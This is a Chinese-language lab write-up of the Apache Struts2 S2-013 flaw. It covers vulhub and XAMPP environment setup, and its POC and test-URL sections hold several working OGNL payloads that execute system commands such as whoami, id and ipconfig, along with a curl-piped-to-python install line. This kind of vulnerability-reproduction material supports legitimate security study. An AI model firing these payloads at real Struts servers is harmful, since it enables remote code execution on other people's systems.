Struts-S2-013漏洞利用(含环境搭建、含POC)

字数 843阅读 970

S2-013

此文仅供大家交流学习,严禁非法使用

一、参考网址:

https://github.com/phith0n/vulhub/tree/master/struts2/s2-013

二、 影响版本:

http://struts.apache.org/docs/s2-013.html

三、 漏洞介绍:

  • 在Struts Blank应用程序中打开HelloWorld.jsp,并将以下参数添加到url / a标签之一:

includeParams="all"

  • 这样一来,这条线将会是这样的:

<s:url
id="url"
action="HelloWorld"
includeParams="all">

  • (它也适用于includeParams =“get”)。

  • 运行struts2-blank应用程序

  • 打开url:http:// localhost:8080 / example / HelloWorld.action?fakeParam =%25%7B(%23_memberAccess%5B'allowStaticMethodAccess'%5D%3Dtrue)(%23context%5B'xwork.MethodAccessor.denyMethodExecution'% 5D%3Dfalse)(%23writer%3D%40org.apache.struts2.ServletActionContext%40getResponse()。getWriter()%2C%23writer.println('hacked')%2C%23writer.close())%7D
    (这是缩写版http://goo.gl/lhlTl

  • 你会注意到,在这种情况下,没有办法逃避/清理fakeParam,因为它不是一个预期的参数。

  • Struts2 标签中 <s:a> 和 <s:url> 都包含一个 includeParams 属性,其值可设置为 none,get 或 all,参考官方其对应意义如下:

none - 链接不包含请求的任意参数值(默认)

get - 链接只包含 GET 请求中的参数和其值

all - 链接包含 GET 和 POST 所有参数和其值

<s:a>用来显示一个超链接,当includeParams=all的时候,会将本次请求的GET和POST参数都放在URL的GET参数上。在放置参数的过程中会将参数进行OGNL渲染,造成任意命令执行漏洞。

四、 环境搭建:

(windows)

环境搭建,类似与一下安装showcase,相同方法可以部署blank

  • 下载/struts/2.1.6

下载地址:http://archive.apache.org/dist/struts/binaries/struts-2.1.6-apps.zip

  • 下载安装xampp

  • 部署showcase

  • 解压

2.1.6_1.png

2.1.6_2.png
  • 复制到.
2.1.6_3.png
  • 重启tomcat
2.1.6_4.png
  • 已成功自动部署
2.1.6_5.png
  • 修改配置

在Struts Blank应用程序中打开HelloWorld.jsp,并将以下参数添加到url / a标签之一:
includeParams="all"
这样一来,这条线将会是这样的:
<s:url id="url" action="HelloWorld" includeParams="all">
运行struts2-blank应用程序

环境搭建:(ubuntu)

curl -s https://bootstrap.pypa.io/get-pip.py | python3

  • 安装docker
    apt-get update && apt-get install docker.io

  • 启动docker服务
    service docker start

  • 安装compose
    pip install docker-compose

注意要先ssh连接,将公钥添加到github上,具体参照网上教程

  • 拉取项目
    git clone git@github.com:phith0n/vulhub.git
    cd vulhub

  • 进入某一个漏洞/环境的目录
    cd nginx_php5_mysql

  • 自动化编译环境
    docker-compose build

  • 启动整个环境
    docker-compose up -d

五、 POC:

${(#_memberAccess["allowStaticMethodAccess"]=true,#a=@java.lang.Runtime@getRuntime().exec('whoami').getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[50000],#c.read(#d),#out=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#out.println(#d),#out.close())}

// 或

${#_memberAccess["allowStaticMethodAccess"]=true,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream())}

六、 测试网址:

原始网址为:

http:// 127.0.0.1:8080/struts2-blank-2.1.6/example/HelloWorld.action

更改后网址为:

http://127.0.0.1:8080/struts2-blank-2.1.6/example/HelloWorld.action?url=%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27whoami%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read%28%23d%29%2C%23out%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23out.println%28%23d%29%2C%23out.close%28%29%29%7D

七、执行结果

1.png

八、 发现问题并修改

存在问题是:执行结果多行时可能无法输出多行(windows),歹后续更改POC

后续POC

%24%7B(%23_memberAccess.allowStaticMethodAccess=true,%23context["xwork.MethodAccessor.denyMethodExecution"]=false,%23cmd="ipconfig",%23ret=@java.lang.Runtime@getRuntime().exec(%23cmd),%23data=new+java.io.DataInputStream(%23ret.getInputStream()),%23res=new+byte[500],%23data.readFully(%23res),%23echo=new+java.lang.String(%23res),%23out=@org.apache.struts2.ServletActionContext@getResponse(),%23out.getWriter().println(%23echo))%7D

弥补之前POC在windows中执行命令结果多行,但只显示第一行的问题,比如ipconfig
执行结果


2.png

注意,修改res大小来获取需要的结果的大小

九、 至此,该漏洞基本利用完毕

本人还是一个未毕业的小萌新,希望大家多多帮助,有问题请发送邮件到xrzsupupup@163.com不胜感激,我也会尽量去帮助大家

坚决做一名白帽子

推荐阅读更多精彩内容